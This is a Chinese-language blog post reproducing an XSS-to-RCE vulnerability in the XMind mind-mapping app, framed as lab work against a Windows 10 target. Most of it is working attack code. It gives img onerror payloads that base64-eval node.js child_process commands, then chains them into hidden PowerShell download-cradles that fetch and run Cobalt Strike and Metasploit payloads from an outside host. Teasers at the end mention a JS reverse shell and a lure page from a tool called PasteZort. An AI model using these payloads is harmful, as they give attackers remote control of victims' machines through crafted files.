XMind XSS RCE 漏洞复现
XMind XSS RCE 漏洞复现
1 漏洞介绍
Xmind对输出的内容没有进行XSS过滤,所以会产生XSS漏洞,因为Xmind也启用了node.js功能,所以会导致命令执行。
2 环境搭建
3 漏洞复现
- 前期提要:
- 靶机:
Windows 10(XMind 202101070032) - 攻击机:
Kali 2023.1
- 靶机:
- 只需要按住
ctrl靠近大纲字符最后就可以弹出:
1 | <img src=1 onerror=alert(1)> |
- 由于借助的是
node.js进行命令执行,
1 | require('child_process').exec('whoami',(error, stdout, stderr)=>{ |
base 64编码一下:
1 | cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3dob2FtaScsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw== |
Payload如下:
1 | <img src=x onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3dob2FtaScsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())'> |
4 主机上线
4.1 CobaltStrike 上线
- 创建一个
Web站点托管:
- 得到一个执行命令:
1 | powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://114.132.241.133:80/xmind'))" |
- 和前面的
Payload组合一下:
注:由于命令在单引号内,而 powershell 命令中也有单引号,所以需要用 \ 进行转义。
1 | require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://114.132.241.133:80/xmind\'))"',(error, stdout, stderr)=>{ |
base 64一下:
1 | <img src=x onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLzExNC4xMzIuMjQxLjEzMzo4MC94bWluZFwnKSkiJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7`,`base64`).toString())'> |
- 成功上线~
4.2 Metasploit 上线
- 与
CS几乎一致:
1 | search web_de |
- 上述命令执行完后,得到一个命令执行代码和地址:
1 | http://192.168.0.103:8080/d2nmrgyYyAK7QhB |
- 修改下上述
CS的代码:
1 | require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://192.168.0.103:8080/d2nmrgyYyAK7QhB\'))"',(error, stdout, stderr)=>{ |
base 64编码一下:
1 | <img src=x onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLzE5Mi4xNjguMC4xMDM6ODA4MC9kMm5tcmd5WXlBSzdRaEJcJykpIicsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())'> |
- 成功上线~
相关推荐
2023-12-01
JS 反弹 Shell
JS 反弹 Shell 前阵子看了篇文章《JS 反弹 Shell》,发在聊骚群里,好基友复现出来了,我也整一手。 参考文章: https://joner11234.github.io/article/ea975567.html https://mp.weixin.qq.com/s/0JUo3fwQDV120zmkm5ZxvA 前情提要: 攻击机:Kali Linux 2023.3 - 10.10.8.21 靶机:Windows 7 SP1 - 10.10.8.17 1 CMD 运行 下载工具: 1git clone https://github.com/ZettaHack/PasteZort.git 授予权限(不给权限可能报错): 12cd PasteZortchmod -R 777 . 运行一下: 1python2 PasteZ0rt.py 选择平台、Payload,填写 IP 和监听端口: 设置完后让填写网页的信息,可以随意填写,也可以写一些诱导性的内容,让用户将其复制到 cmd 中运行,写完后按回车,再输入 y 按回车确定: 设置...
2023-02-19
PhpStudy 后门漏洞复现
PhpStudy 后门漏洞复现 最近打靶遇到了这个漏洞,之前不怎么关注,既然看见了就做个记录。 1 漏洞描述1.1 事件起因 PhpStudy 软件是国内的一款免费的 PHP 调试环境的程序集成包,通过集成 Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer 多款软件一次性安装,无需配置即可直接安装使用,在国内有着近百万 PHP 语言学习者、开发者用户。 正是这样一款公益性软件在 2018 年 12 月 4 日,西湖区公安分局网警大队接报案称,某公司发现公司内有 20 余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量敏感信息。 通过专业技术溯源进行分析,查明了数据回传的信息种类、原理方法、存储位置,并聘请了第三方鉴定机构对软件中的 “后门” 进行司法鉴定,鉴定结果是该 “后门” 文件具有控制计算机的功能,嫌疑人已通过该后门远程控制下载运行脚本实现收集用户个人信息。 截至 2019 年 1 月被抓获,犯罪团伙共非法控制计算机 67 万余台,非法获取账号密码类、聊天数据类、设备码类等数据 10 万余组,非法牟利 600 余万元。...
2023-12-29
ShellShock(CVE-2014-6271)
ShellShock(CVE-2014-6271) 现在打靶都是 Docker 了,老人家也与时俱进一下,正好可以上课和学生演示使用,适当挖坑 QAQ。 1 漏洞说明 Shellshock 是一个严重的安全漏洞,影响了 Bash shell(命令行解释器)的版本。该漏洞于 2014 年 9 月被公开披露,引起了广泛的关注和忧虑。 Shellshock 漏洞的原因是 Bash 在处理环境变量时存在一个缺陷,使得攻击者可以通过在环境变量中注入恶意代码来执行任意命令。这种漏洞可能导致未经授权的访问、数据泄露、系统崩溃以及其他安全问题。 漏洞影响版本:GNU Bash <= 4.3 2 漏洞环境 运行漏洞环境: 12cd bash/CVE-2014-6271docker-compose up -d 3 漏洞复现3.1 漏洞环境 服务启动后,有两个页面: http://your-ip:8080/victim.cgi:使用 bash-4.3.0 的页面 http://your-ip:8080/safe.cgi:使用 bash-4.3.30 生成的页面 简单看一下这两个文件...
